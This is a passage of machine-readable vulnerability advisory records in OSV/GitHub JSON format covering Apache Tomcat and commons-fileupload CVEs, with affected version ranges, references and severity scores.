(FileUploadBase#setFileCountMax) is not enabled by default and must be explicitly configured.", "affected": [ { "package": { "name": "commons-fileupload:commons-fileupload", "ecosystem": "Maven", "purl": "pkg:maven/commons-fileupload/commons-fileupload" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.5" } ] } ], "versions": [ "1.0", "1.0-beta-1", "1.0-rc1", "1.1", "1.1.1", "1.2", "1.2.1", "1.2.2", "1.3", "1.3.1", "1.3.1-jenkins-1", "1.3.1-jenkins-2", "1.3.2", "1.3.3", "1.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-hfrx-6qgj-fp6c/GHSA-hfrx-6qgj-fp6c.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.5" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.2", "10.1.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-hfrx-6qgj-fp6c/GHSA-hfrx-6qgj-fp6c.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M2" }, { "fixed": "11.0.0-M5" } ] } ], "versions": [ "11.0.0-M3", "11.0.0-M4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-hfrx-6qgj-fp6c/GHSA-hfrx-6qgj-fp6c.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.85" }, { "fixed": "8.5.88" } ] } ], "versions": [ "8.5.85", "8.5.86", "8.5.87" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-hfrx-6qgj-fp6c/GHSA-hfrx-6qgj-fp6c.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.71" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-hfrx-6qgj-fp6c/GHSA-hfrx-6qgj-fp6c.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.5" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.2", "10.1.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-hfrx-6qgj-fp6c/GHSA-hfrx-6qgj-fp6c.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M2" }, { "fixed": "11.0.0-M5" } ] } ], "versions": [ "11.0.0-M3", "11.0.0-M4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-hfrx-6qgj-fp6c/GHSA-hfrx-6qgj-fp6c.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.85" }, { "fixed": "8.5.88" } ] } ], "versions": [ "8.5.85", "8.5.86", "8.5.87" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-hfrx-6qgj-fp6c/GHSA-hfrx-6qgj-fp6c.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.71" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-hfrx-6qgj-fp6c/GHSA-hfrx-6qgj-fp6c.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-24998" }, { "type": "WEB", "url": "https://github.com/apache/commons-fileupload/commit/e20c04990f7420ca917e96a84cec58b13a1b3d17" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/8a2285f13affa961cc65595aad999db5efae45ce" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/9ca96c8c1eba86c0aaa2e6be581ba2a7d4d4ae6e" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/cf77cc545de0488fb89e24294151504a7432df74" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/d53d8e7f77042cc32a3b98f589496a1ef5088e38" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5522" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-8.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20241108-0002" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230302-0013" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202305-37" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/07/msg00008.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread/4xl4l09mhwg4vgsk7dxqogcjrobrrdoy" }, { "type": "WEB", "url": "https://github.com/search?q=repo%3Aapache%2Ftomcat+util.http+path%3A%2F%5Eres%5C%2Fbnd%5C%2F%2F\u0026type=code" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-fileupload" }, { "type": "WEB", "url": "https://commons.apache.org/proper/commons-fileupload/security-reports.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/05/22/1" } ], "database_specific": { "cwe_ids": [ "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2023-02-22T00:12:07Z", "nvd_published_at": "2023-02-20T16:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hgrr-935x-pq79", "published": "2025-10-27T18:31:13Z", "modified": "2025-11-05T21:08:18.888100Z", "aliases": [ "CVE-2025-61795" ], "related": [ "CGA-7mvr-5m45-qj72", "CGA-8r8c-f385-rjq7", "CGA-9jp5-3v3c-f4mc", "CGA-g5qh-ggv5-g3xv", "CGA-j452-cfc3-8ffx", "CGA-q4w6-262v-263g", "CGA-v7h9-8q55-77cv" ], "summary": "Apache Tomcat Vulnerable to Improper Resource Shutdown or Release", "details": "If an error occurred (including exceeding limits) during the processing of a multipart upload, temporary copies of the uploaded parts written to disc were not cleaned up immediately but left for the garbage collection process to delete. Depending on JVM settings, application memory usage and application load, it was possible that space for the temporary copies of uploaded parts would be filled faster than GC cleared it, leading to a DoS.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.11, from 10.1.0-M1 through 10.1.46, from 9.0.0.M1 through 9.0.109.\n\nThe following versions were EOL at the time the CVE was created but are \nknown to be affected: 8.5.0 though 8.5.100. Other, older, EOL versions may also be affected.\nUsers are recommended to upgrade to version 11.0.12 or later, 10.1.47 or later or 9.0.110 or later which fixes the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.12" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.10", "11.0.11", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-hgrr-935x-pq79/GHSA-hgrr-935x-pq79.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.47" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.42", "10.1.43", "10.1.44", "10.1.45", "10.1.46", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-hgrr-935x-pq79/GHSA-hgrr-935x-pq79.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.40" }, { "fixed": "9.0.110" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.106", "9.0.107", "9.0.108", "9.0.109", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-hgrr-935x-pq79/GHSA-hgrr-935x-pq79.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.60" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.100", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-hgrr-935x-pq79/GHSA-hgrr-935x-pq79.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.12" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.10", "11.0.11", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-hgrr-935x-pq79/GHSA-hgrr-935x-pq79.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.47" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.42", "10.1.43", "10.1.44", "10.1.45", "10.1.46", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-hgrr-935x-pq79/GHSA-hgrr-935x-pq79.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.40" }, { "fixed": "9.0.110" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.106", "9.0.107", "9.0.108", "9.0.109", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-hgrr-935x-pq79/GHSA-hgrr-935x-pq79.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.60" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.100", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-hgrr-935x-pq79/GHSA-hgrr-935x-pq79.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.12" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.10", "11.0.11", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-hgrr-935x-pq79/GHSA-hgrr-935x-pq79.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.47" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.42", "10.1.43", "10.1.44", "10.1.45", "10.1.46", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-hgrr-935x-pq79/GHSA-hgrr-935x-pq79.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.40" }, { "fixed": "9.0.110" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.106", "9.0.107", "9.0.108", "9.0.109", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-hgrr-935x-pq79/GHSA-hgrr-935x-pq79.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.60" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.100", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-hgrr-935x-pq79/GHSA-hgrr-935x-pq79.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61795" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/1cdf5f730ede75a0759492f179ac21ca4ff68e06" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/af6e9181620304c0d818121c29c074e1330610d0" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/afa422bd7ca1eef0f507259c682fd876494d9c3b" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/wm9mx8brmx9g4zpywm06ryrtvd3160pp" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.1.47" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html#Fixed_in_Apache_Tomcat_11.0.12" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.110" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/10/27/6" } ], "database_specific": { "cwe_ids": [ "CWE-404" ], "github_reviewed": true, "github_reviewed_at": "2025-10-28T18:02:45Z", "nvd_published_at": "2025-10-27T18:15:44Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hh3j-x4mc-g48r", "published": "2019-12-26T18:22:36Z", "modified": "2024-03-14T05:19:45.437799Z", "aliases": [ "CVE-2019-12418" ], "related": [ "CGA-8w25-pmjp-vrmj" ], "summary": "Insufficiently Protected Credentials in Apache Tomcat", "details": "When Apache Tomcat 9.0.0.M1 to 9.0.28, 8.5.0 to 8.5.47, 7.0.0 and 7.0.97 is configured with the JMX Remote Lifecycle Listener, a local attacker without access to the Tomcat process or configuration files is able to manipulate the RMI registry to perform a man-in-the-middle attack to capture user names and passwords used to access the JMX interface. The attacker can then use these credentials to access the JMX interface and gain complete control over the Tomcat instance.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "7.0.99" } ] } ], "versions": [ "7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.8", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86", "7.0.88", "7.0.90", "7.0.91", "7.0.92", "7.0.93", "7.0.94", "7.0.96" ], "database_specific": { "last_known_affected_version_range": "\u003c 7.0.98", "source": 